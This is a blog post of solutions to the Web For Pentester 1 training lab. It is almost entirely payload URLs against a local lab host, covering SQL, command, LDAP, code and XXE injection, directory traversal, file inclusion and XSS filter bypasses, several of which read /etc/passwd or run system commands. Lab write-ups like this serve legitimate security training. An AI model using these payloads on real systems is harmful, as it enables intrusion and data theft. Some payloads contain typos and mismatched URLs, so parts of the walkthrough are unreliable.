Tuesday, 10 January 2017

Web For Pentester 1 solutions all in one



Web For Pen tester 1 solutions all in one. First Download the ISO file from HERE .


web for pentester 1:

sql:
1.Link:http://192.168.145.158/sqli/example1.php?name=root
http://192.168.145.158/sqli/example1.php?name=root' or '1'='1
2.http://192.168.145.158/sqli/example2.php?name=root
http://192.168.145.158/sqli/example2.php?name=root' or '1'='1
No space error
http://192.168.145.158/sqli/example2.php?name=root'\tor\t'1'='1
encode \t though %09
http://192.168.145.158/sqli/example2.php?name=root'%09or%09'1'='1
3.Link:http://192.168.145.158/sqli/example3.php?name=root
http://192.168.145.158/sqli/example3.php?name=root'%09or%09'1'='1
space error
http://192.168.145.158/sqli/example3.php?name=root'/**/or/**/'1'='1
4.http://192.168.145.158/sqli/example4.php?id=2
http://192.168.145.158/sqli/example4.php?id=2'/**/or/**/'1'='1
http://192.168.145.158/sqli/example4.php?id=2 or 1=1
5.http://192.168.145.158/sqli/example5.php?id=2
http://192.168.145.158/sqli/example5.php?id=2 or 1=1
6.http://192.168.145.158/sqli/example6.php?id=2
http://192.168.145.158/sqli/example6.php?id=2 or 1=1
7.http://192.168.145.158/sqli/example7.php?id=2
http://192.168.145.158/sqli/example7.php?id=2%0A or 1=1
8.http://192.168.145.158/sqli/example8.php?order=name
http://192.168.145.158/sqli/example8.php?order=name
-------------------------------------------------------------------
Directory traversal:
1.http://192.168.145.158/dirtrav/example1.php?file=../../../../../etc/passwd
2.http://192.168.145.158/dirtrav/example2.php?file=/var/www/files/../../../../../etc/passwd
3.http://192.168.145.158/dirtrav/example3.php?file=../../../../../etc/passwd
-------------------------------------------------------------------
Command Injection:
1.http://192.168.145.158/commandexec/example1.php?ip=127.0.0.1
http://192.168.145.158/commandexec/example1.php?ip=127.0.0.1;id
http://192.168.145.158/commandexec/example1.php?ip=127.0.0.1| id
http://192.168.145.158/commandexec/example1.php?ip=127.0.0.1;ls;id;ls -ltr;pwd
2.http://192.168.145.158/commandexec/example2.php?ip=127.0.0.1
just put %0a : http://192.168.145.158/commandexec/example2.php?ip=127.0.0.1%0als%0apwd%0acat /etc/passwd
3. http://192.168.145.158/commandexec/example3.php?ip=127.0.0.1
still pending

-------------------------------------------------------------
ldap attack:
1.http://192.168.145.158/ldap/example1.php?username=hacker&password=hacker
http://192.168.145.158/ldap/example1.php
2.http://192.168.145.158/ldap/example2.php?name=hacker&password=hacker
http://192.168.145.158/ldap/example2.php?name=hacker)(cn=*))&password=hacker

-------------------------------------------------------------------------
file inclide:
1.http://192.168.145.158/fileincl/example1.php?page=intro.php
http://192.168.145.158/fileincl/example1.php?page=../../../etc/passwd
2.http://192.168.145.158/fileincl/example2.php?page=intro
http://192.168.145.158/fileincl/example2.php?page=../../../etc/passwd
-------------------------------------------------------------------------
xml attacks:
1.http://192.168.145.158/xml/example1.php?xml=<test>hacker</test>
u have to encode this one as url and have to paste xml=  : and
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>

http://192.168.145.158/xml/example1.php?xml=%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2ftest%3E
2.http://192.168.145.158/xml/example2.php?name=hacker
http://192.168.145.158/xml/example2.php?name=' or 1=1]
---------------------------------------------------------------------------
Code injection:
1.http://192.168.145.158/codeexec/example1.php?name=hacker
http://192.168.145.158/codeexec/example1.php?name=hacker"; system("ls"); //
2.http://192.168.145.158/codeexec/example2.php?order=id
http://192.168.145.158/codeexec/example2.php?order=id);}system('ls');%23
3.http://192.168.145.158/codeexec/example3.php?new=hacker&pattern=/lamer/&base=Hello lamer
http://192.168.145.158/codeexec/example3.php?new=phpinfo()&pattern=/lamer/&ebase=Hello lamer
http://192.168.145.158/codeexec/example3.php?new=system('ls')&pattern=/lamer/&ebase=Hello lamer
4.http://192.168.145.158/codeexec/example4.php?name=hacker
http://192.168.145.158/codeexec/example4.php?name=hacke'.system("ls");%23

-------------------------------------------------------------------------------------
xss:
1.http://192.168.145.158/xss/example1.php?name=hacker
http://192.168.145.158/xss/example1.php?name=hacker<scritp>alert('hell')</script>
2.http://192.168.145.158/xss/example1.php?name=hacker
http://192.168.145.158/xss/example2.php?name=hacker<SCritp>alert('hell')</SCript>
3.http://192.168.145.158/xss/example1.php?name=hacker
http://192.168.145.158/xss/example3.php?name=hacker<scri<script>pt>alert('xss')</scri</script>pt>
4.http://192.168.145.158/xss/example4.php?name=hacker
http://192.168.145.158/xss/example3.php?name=hacker<img src='nonexistant' onerror='alert("xss")' />
5.http://192.168.145.158/xss/example5.php?name=hacker
http://192.168.145.158/xss/example5.php?name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
6.http://192.168.145.158/xss/example6.php?name=hacker
http://192.168.145.158/xss/example5.php?name=hacket";alert('xss');"
7.http://192.168.145.158/xss/example7.php?name=hacker
http://192.168.145.158/xss/example6.php?name=hacker';alert('xss');'
8.http://192.168.145.158/xss/example8.php?name=hacker
http://192.168.145.158/xss/example6.php?name=hacker/"><script>alert('xss')</script>
9.http://192.168.145.158/xss/example9.php#hacker
http://192.168.145.158/xss/example9.php#<scritp>alert('anuj')</script>

Enjoy:

Join me in Facebook  HERE

No comments:

Post a Comment

Popular Posts